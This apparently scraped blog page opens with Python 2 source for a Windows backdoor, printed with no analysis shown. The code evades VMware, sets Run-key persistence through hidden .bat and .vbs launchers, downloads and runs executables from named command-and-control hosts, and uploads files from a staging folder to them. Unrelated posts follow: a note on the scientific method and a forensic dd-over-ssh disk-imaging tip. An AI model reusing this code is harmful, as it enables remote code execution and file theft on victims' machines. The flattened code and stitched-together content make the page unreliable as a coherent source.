from urllib2 import urlopen from urllib import urlencode from glob import glob from os import path from os import makedirs from os import remove from fileinput import FileInput from socket import gethostname from time import sleep from time import time from os import popen2 from os import popen from re import findall from re import IGNORECASE from psutil import get_pid_list from psutil import Process from sys import exit from sys import argv from httplib import HTTPConnection from os import getpid from os import kill def getserver1(): srv = "games-playbox.com" try: code1 = urlopen('http://worldvoicetrip.com/games/index.html') code2 = code1.read() if int(code2) == 1: code3 = urlopen('http://worldvoicetrip.com/games/domain.html') code4 = code3.read() return code4 else: return srv except: return srv pass foldername = "/winone1" dir1 = "c:\\dir\\" dir3 = "c:\\dir" dir2 = "c:\\dir\\dir2\\" dir4 = "dir2" _file = path.abspath(argv[0]) fpath = path.dirname(path.realpath(_file)) file17 = path.basename(_file) def SysInfo(): values = {} cache = popen2("SYSTEMINFO") source = cache[1].read() sysOpts = ["System Model"] for opt in sysOpts: values[opt] = [item.strip() for item in findall("%s:\w*(.*?)\n" % (opt), source, IGNORECASE)][0] return values try: sysinfo1 = SysInfo() sysinfo2 = str(sysinfo1) except: sysinfo2 = "Test" pass if sysinfo2.find("VMware") <> -1: print "VMware" #exit() pcount = 0 xx = get_pid_list() myid = getpid() for i in xx: try: pro = Process(i).name if pro.find(file17) <> -1: if i != myid: p = i pcount = pcount + 1 except: continue if pcount > 2: exit() try: kill(p, 9) except: pass class ChunkedEncodingWrapper(object): def __init__(self, fileobj, blocksize=102400): self.fileobj = fileobj self.blocksize = blocksize self.current_chunk = "" self.closed = False def read(self, size=None): ret = "" while size is None or size >= len(self.current_chunk): ret += self.current_chunk if size is not None: size -= len(self.current_chunk) if self.closed: self.current_chunk = "" break self._get_chunk() else: ret += self.current_chunk[:size] self.current_chunk = self.current_chunk[size:] return ret def _get_chunk(self): if not self.closed: chunk = self.fileobj.read(self.blocksize) if chunk: self.current_chunk = "%x" % (len(chunk),) + "\r\n" + chunk + "\r\n" else: self.current_chunk = "0\r\n\r\n" self.closed = True if not path.exists(dir1): makedirs(dir1) if not path.exists(dir2): makedirs(dir2) try: batch = open(dir2+'run.bat','wb') bat2='REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Search /t REG_SZ /d "%s%s" /f'%(dir2,file17) batch.write(bat2) batch.close() f1 = open(dir2+'run.vbs','wb') data12='Set WshShell = CreateObject("WScript.Shell" )\n' data12+='WshShell.Run chr(34) & "'+dir2+'run.bat" & Chr(34), 0\n' data12+='Set WshShell = Nothing' f1.write(data12) f1.close() the_output = popen(dir2+"run.vbs").read() except: pass the_output = popen("attrib +h +s %s"%(dir3)).read() the_output = popen("copy %s %s"%(file17,dir2)).read() cname = gethostname() def splitFile(inputFile,chunkSize,basename1): f = open(inputFile, 'rb') data = f.read() f.close() bytes = len(data) noOfChunks= bytes/chunkSize if(bytes%chunkSize): noOfChunks+=1 f = open(inputFile+'-info.txt', 'w') f.write(basename+','+str(noOfChunks)) f.close() chunkNames = [] j = 0 for i in range(0, bytes+1, chunkSize): j = j + 1 fn1 = inputFile+"-%s" % j chunkNames.append(fn1) f = open(fn1, 'wb') f.write(data[i:i+ chunkSize]) f.close() getserver = getserver1() def runfile(ext): sleep(2) data2len = len(ext) if data2len <> 0: try: if dfile.find(file17) == -1: f1 = open(dir2+'run.vbs','wb') data12='Set WshShell = CreateObject("WScript.Shell" )\n' data12+='WshShell.Run chr(34) & "'+ext+'" & Chr(34), 0\n' data12+='Set WshShell = Nothing' f1.write(data12) f1.close() size1 = path.getsize(ext) if size1 <> 0: the_output = popen(dir2+"run.vbs").read() remove(dir2+"run.vbs") else: remove(dfile) except: pass def dex(cname): try: dfiles5 = urlopen("http://"+ getserver + foldername+ "/online.php?sysname="+cname+"") dfiles6 = dfiles5.read() dfiles7 = dfiles6.split(';') data7len = len(dfiles6) if data7len <> 0: for dfile in dfiles7: try: f5 = urlopen("http://"+ getserver + foldername+ "/download/%s"%dfile) output1=open(dir2+"%s"%dfile,'wb') output1.write(f5.read()) output1.close() dfile = dir2+dfile runfile(dfile) except: continue except: pass def dex1(): try: dfiles12 = urlopen("http://"+ getserver + foldername+ "/getfile.php") dfiles11 = dfiles12.read() dfiles13 = dfiles1.split(';') files11 = glob(dir2+"*") for dfile14 in dfiles13: try: if not (dfile14 in files11): f11 = urlopen("http://"+ getserver + foldername+ "/download/%s"%dfile14) output11=open(dir2+"%s"%dfile14,'wb') output11.write(f11.read()) output11.close() dfile = '' dfile = dir2+dfile14 runfile(dfile) except: continue except: pass try: urlopen("http://"+ getserver + foldername+ "/post.php?filename=&folder="+cname+"//") dfiles2 = urlopen("http://"+ getserver + foldername+ "/getfile.php") dfiles1 = dfiles2.read() datalen3 = len(dfiles1) if datalen3 == 0: dfiles = '' dfiles = glob(dir2+"*.exe") for dfile in dfiles: try: runfile(dfile) except: continue else: dfiles = dfiles1.split(';') for dfile in dfiles: try: f = urlopen("http://"+ getserver + foldername+ "/download/%s"%dfile) output=open(dir2+"%s"%dfile,'wb') output.write(f.read()) output.close() dfiles = '' dfiles = dir2+"%s"%(dfile) runfile(dfiles) except: continue except: dfiles = '' dfiles = glob(dir2+"*.exe") for dfile in dfiles: try: runfile(dfile) except: continue remove(dir2+"run.bat") print "Enting While" time1 = int(time()) count = 0 while True: try: time2 = int(time()) tdif = time2 - time1 if tdif > 3600: dex1() time1 = int(time()) sleep (1) count = count + 1 files = glob(dir1+"*") if count > 120 : urlopen("http://"+ getserver + foldername+ "/post.php?filename=&folder="+cname+"//") dex(cname) count = 0 for file1 in files: try: if file1.find(dir4) <> -1: continue try: myfile = open(file1, "r+") except: continue myfile.close() basename = path.basename(file1) size = path.getsize(file1) if size > 105163101 : splitFile(file1,105163101,basename) remove(file1) data = open(file1,"rb") w = ChunkedEncodingWrapper(data) v = urlencode({'filename': basename}) x = urlencode({'folder': cname}) headers = {"Transfer-Encoding": "chunked"} c = HTTPConnection(getserver) c.request("POST", "%s/post.php?%s&%s/"%(foldername,v,x), w, headers) data.close() remove(file1) dex(cname) count = 0 time2 = int(time()) tdif = time2 - time1 if tdif > 3600: dex1() time1 = int(time()) except: pass except: pass
What Science is All About
This is a good lay description of science:
If you cherry-pick scientific truths to serve cultural, economic, religious or political objectives, you undermine the foundations of an informed democracy.
Science distinguishes itself from all other branches of human pursuit by its power to probe and understand the behavior of nature on a level that allows us to predict with accuracy, if not control, the outcomes of events in the natural world. Science especially enhances our health, wealth and security, which is greater today for more people on Earth than at any other time in human history.
The scientific method, which underpins these achievements, can be summarized in one sentence, which is all about objectivity:
Do whatever it takes to avoid fooling yourself into thinking something is true that is not, or that something is not true that is.
Given the current trend with pop-psychology books, it’s nice to see someone write something that is easily accessible, yet accurate.
Transfer a disk image via dd and ssh
To transfer a disk image via an ssh tunnel (think evidence collection across the internet):
dd if=</path/to/disk> | ssh user@host “dd of=<filename>”
For example:
dd if=/dev/sda | ssh user@example.com “dd of=image.dd”
In practice, you’ll probably want to use some additional dd options such as bs (block size), count, etc. If doing this for evidentiary purposes, dcfldd, dc3dd, ewfacquire, and others, provide more forensic-friendly options.
To compress data before sending it across the network, add bzip2 (or gzip) with another pipe:
dd if=</path/to/disk> | bzip2 | ssh user@host “dd of=<filename”.
- 1
- 2
- 3
- 4
- Next Page »